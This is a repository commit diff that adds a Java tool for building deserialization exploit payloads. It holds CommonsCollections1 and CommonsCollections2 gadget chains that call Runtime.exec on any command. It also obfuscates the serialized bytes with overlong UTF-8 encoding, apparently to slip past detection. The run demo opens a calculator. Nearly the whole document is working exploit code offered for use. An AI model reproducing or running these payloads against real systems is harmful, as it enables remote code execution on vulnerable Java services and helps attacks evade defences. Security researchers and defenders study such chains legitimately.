Whoopsunix
diff --git a/‎README.md
Lines changed: 5 additions & 0 deletions b/‎README.md
Lines changed: 5 additions & 0 deletions
diff --git a/‎pom.xml
Lines changed: 43 additions & 0 deletions b/‎pom.xml
Lines changed: 43 additions & 0 deletions
diff --git a/‎src/main/java/com/ppp/CommonsCollections1.java
Lines changed: 46 additions & 0 deletions b/‎src/main/java/com/ppp/CommonsCollections1.java
Lines changed: 46 additions & 0 deletions
diff --git a/‎src/main/java/com/ppp/CommonsCollections2.java
Lines changed: 35 additions & 0 deletions b/‎src/main/java/com/ppp/CommonsCollections2.java
Lines changed: 35 additions & 0 deletions
diff --git a/‎src/main/java/com/ppp/Run.java
Lines changed: 44 additions & 0 deletions b/‎src/main/java/com/ppp/Run.java
Lines changed: 44 additions & 0 deletions
@@ -0,0 +1,5 @@
+# utf-8-overlong-encoding
+
+By. Whoopsunix
+
+抽离出 utf-8-overlong-encoding 的序列化逻辑，直接加密序列化数组
@@ -0,0 +1,43 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+
+    <groupId>com.ppp</groupId>
+    <artifactId>utf-8-overlong-encoding</artifactId>
+    <version>1.0</version>
+    <packaging>jar</packaging>
+
+    <name>utf-8-overlong-encoding</name>
+
+    <properties>
+        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+    </properties>
+
+    <dependencies>
+        <dependency>
+            <groupId>javassist</groupId>
+            <artifactId>javassist</artifactId>
+            <version>3.12.0.GA</version>
+        </dependency>
+        <dependency>
+            <groupId>commons-collections</groupId>
+            <artifactId>commons-collections</artifactId>
+            <version>3.1</version>
+        </dependency>
+        <dependency>
+            <groupId>org.beanshell</groupId>
+            <artifactId>bsh</artifactId>
+            <version>2.0b5</version>
+        </dependency>
+        <dependency>
+            <groupId>commons-beanutils</groupId>
+            <artifactId>commons-beanutils</artifactId>
+            <version>1.9.2</version>
+        </dependency>
+        <dependency>
+            <groupId>org.apache.commons</groupId>
+            <artifactId>commons-collections4</artifactId>
+            <version>4.0</version>
+        </dependency>
+    </dependencies>
+</project>
@@ -0,0 +1,46 @@
+package com.ppp;
+
+import com.ppp.utils.Gadgets;
+import com.ppp.utils.Reflections;
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.map.LazyMap;
+
+import java.lang.reflect.InvocationHandler;
+import java.util.HashMap;
+import java.util.Map;
+
+public class CommonsCollections1 {
+	public InvocationHandler getObject(final String command) throws Exception {
+		final String[] execArgs = new String[] { command };
+		// inert chain for setup
+		final Transformer transformerChain = new ChainedTransformer(
+			new Transformer[]{ new ConstantTransformer(1) });
+		// real chain for after setup
+		final Transformer[] transformers = new Transformer[] {
+				new ConstantTransformer(Runtime.class),
+				new InvokerTransformer("getMethod", new Class[] {
+					String.class, Class[].class }, new Object[] {
+					"getRuntime", new Class[0] }),
+				new InvokerTransformer("invoke", new Class[] {
+					Object.class, Object[].class }, new Object[] {
+					null, new Object[0] }),
+				new InvokerTransformer("exec",
+					new Class[] { String.class }, execArgs),
+				new ConstantTransformer(1) };
+
+		final Map innerMap = new HashMap();
+
+		final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
+
+		final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);
+
+		final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
+
+		Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain
+
+		return handler;
+	}
+}
@@ -0,0 +1,35 @@
+package com.ppp;
+
+import com.ppp.utils.Gadgets;
+import com.ppp.utils.Reflections;
+import org.apache.commons.collections4.comparators.TransformingComparator;
+import org.apache.commons.collections4.functors.InvokerTransformer;
+
+import java.util.PriorityQueue;
+import java.util.Queue;
+
+
+public class CommonsCollections2 {
+
+	public Queue<Object> getObject(final String command) throws Exception {
+		final Object templates = Gadgets.createTemplatesImpl(command);
+		// mock method name until armed
+		final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
+
+		// create queue with numbers and basic comparator
+		final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer));
+		// stub data for replacement later
+		queue.add(1);
+		queue.add(1);
+
+		// switch method called by comparator
+		Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");
+
+		// switch contents of queue
+		final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
+		queueArray[0] = templates;
+		queueArray[1] = 1;
+
+		return queue;
+	}
+}
@@ -0,0 +1,44 @@
+package com.ppp;
+
+import com.ppp.utils.Deserializer;
+import com.ppp.utils.Serializer;
+
+import java.io.ByteArrayOutputStream;
+
+/**
+ * @author Whoopsunix
+ */
+public class Run {
+    public static void main(String[] args) throws Exception {
+        /**
+         * 原始
+         */
+        Object gadget = new CommonsCollections1().getObject("open -a Calculator.app");
+        byte[] originalBytes = Serializer.serialize(gadget);
+        System.out.println("---original---");
+        print(originalBytes);
+
+        /**
+         * 1ue demo
+         */
+        byte[] UEBytes = Serializer.serializeCustom(gadget);
+        System.out.println("\n\n\n---1ue---");
+        print(UEBytes);
+
+
+
+        System.out.println("\n\n\n---mix---");
+        byte[] mixBytes = new UTF8BytesMix(Serializer.serialize(gadget)).builder();
+        print(mixBytes);
+        Deserializer.deserialize(mixBytes);
+    }
+
+
+    public static void print(byte[] bytes ){
+        ByteArrayOutputStream out = new ByteArrayOutputStream();
+        for (byte b : bytes) {
+            out.write(b);
+        }
+        System.out.println(out);
+    }
+}